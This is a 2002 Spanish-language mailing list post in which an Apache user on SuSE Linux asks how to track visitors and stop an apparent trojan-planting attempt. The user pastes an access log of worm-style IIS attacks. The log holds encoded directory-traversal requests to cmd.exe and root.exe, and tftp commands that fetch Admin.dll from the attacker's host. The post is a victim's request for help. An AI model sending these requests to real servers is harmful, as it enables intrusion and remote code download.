Lo primero daros a todos las gracias, pues hace unas semanas hice una
consulta para poder poner a funcionar mi servidor apache, y entre las
respuestas de unos y otros pude hacer funcionar el servidor.
Ahora mi nueva consulta, ¿como puedo controlar on-line kien esta
accediendo a mi servidor? y la segunda y mas compreja ¿como me desago de
esto? Entiendo ke es alguien ke esta tratando de colarme un troyano. Os
dejo como muestra su ultimo intento. Por cierto Uso Suse Linux 7.3
personal y como http Apache 1.3.20.
Gracias de antemano.
> 80.26.6.67 - - [29/Mar/2002:13:21:50 +0100] "GET
> /scripts/root.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20Admin.dll
> HTTP/1.0" 200 4
> 80.26.6.67 - - [29/Mar/2002:13:21:51 +0100] "GET /scripts/Admin.dll HTTP/1.0"
> 404 281
> 80.26.6.67 - - [29/Mar/2002:13:21:51 +0100] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 200 4
> 80.26.6.67 - - [29/Mar/2002:13:21:52 +0100] "GET
> /MSADC/root.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20Admin.dll
> HTTP/1.0" 200 4
> 80.26.6.67 - - [29/Mar/2002:13:21:52 +0100] "GET /MSADC/Admin.dll HTTP/1.0"
> 404 279
> 80.26.6.67 - - [29/Mar/2002:13:21:53 +0100] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 4
> 80.26.6.67 - - [29/Mar/2002:13:21:53 +0100] "GET
> /c/winnt/system32/cmd.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20c:\Ad
> min.dll HTTP/1.0" 200 4
> 80.26.6.67 - - [29/Mar/2002:13:21:53 +0100] "GET
> /c/winnt/system32/cmd.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20d:\Ad
> min.dll HTTP/1.0" 200 4
> 80.26.6.67 - - [29/Mar/2002:13:21:54 +0100] "GET
> /c/winnt/system32/cmd.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20e:\Ad
> min.dll HTTP/1.0" 200 4
> 80.26.6.67 - - [29/Mar/2002:13:21:54 +0100] "GET /c/Admin.dll HTTP/1.0" 404
> 275
> 80.26.6.67 - - [29/Mar/2002:13:21:55 +0100] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 4
> 80.26.6.67 - - [29/Mar/2002:13:21:55 +0100] "GET
> /d/winnt/system32/cmd.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20c:\Ad
> min.dll HTTP/1.0" 200 4
> 80.26.6.67 - - [29/Mar/2002:13:21:55 +0100] "GET
> /d/winnt/system32/cmd.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20d:\Ad
> min.dll HTTP/1.0" 200 4
> 80.26.6.67 - - [29/Mar/2002:13:21:56 +0100] "GET
> /d/winnt/system32/cmd.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20e:\Ad
> min.dll HTTP/1.0" 200 4
> 80.26.6.67 - - [29/Mar/2002:13:21:56 +0100] "GET /d/Admin.dll HTTP/1.0" 404
> 275
> 80.26.6.67 - - [29/Mar/2002:13:21:57 +0100] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
> 80.26.6.67 - - [29/Mar/2002:13:21:57 +0100] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 319
> 80.26.6.67 - - [29/Mar/2002:13:21:58 +0100] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 319
> 80.26.6.67 - - [29/Mar/2002:13:21:58 +0100] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sys
> tem32/cmd.exe?/c+dir HTTP/1.0" 404 335
> 80.26.6.67 - - [29/Mar/2002:13:21:58 +0100] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
> 80.26.6.67 - - [29/Mar/2002:13:21:59 +0100] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
> 80.26.6.67 - - [29/Mar/2002:13:21:59 +0100] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
> 80.26.6.67 - - [29/Mar/2002:13:22:00 +0100] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
> 80.26.6.67 - - [29/Mar/2002:13:22:00 +0100] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
> 80.26.6.67 - - [29/Mar/2002:13:22:00 +0100] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
> 80.26.6.67 - - [29/Mar/2002:13:22:01 +0100] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
> 80.26.6.67 - - [29/Mar/2002:13:22:01 +0100] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302